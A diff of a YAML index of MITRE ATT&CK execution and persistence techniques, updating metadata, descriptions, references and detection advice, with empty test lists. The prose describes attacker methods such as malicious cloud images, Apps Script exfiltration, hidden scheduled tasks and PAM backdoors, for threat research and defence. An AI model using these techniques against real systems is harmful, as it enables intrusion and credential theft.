+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -29556,7 +29935,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -29583,30 +29962,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -29623,9 +29984,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -29633,21 +29995,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -29697,28 +30075,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -29729,32 +30090,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -29797,12 +30170,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -29859,11 +30231,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -29928,14 +30299,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -29956,14 +30326,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -29972,16 +30347,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -30007,6 +30384,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -30021,29 +30406,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -30056,25 +30422,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -30124,17 +30506,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -30197,7 +30578,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -30231,8 +30612,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -30241,6 +30622,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -30253,29 +30638,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -30322,7 +30707,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -30354,8 +30739,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -30369,6 +30754,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -30381,16 +30770,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -30453,7 +30845,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -30518,49 +30909,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -30575,20 +30927,57 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
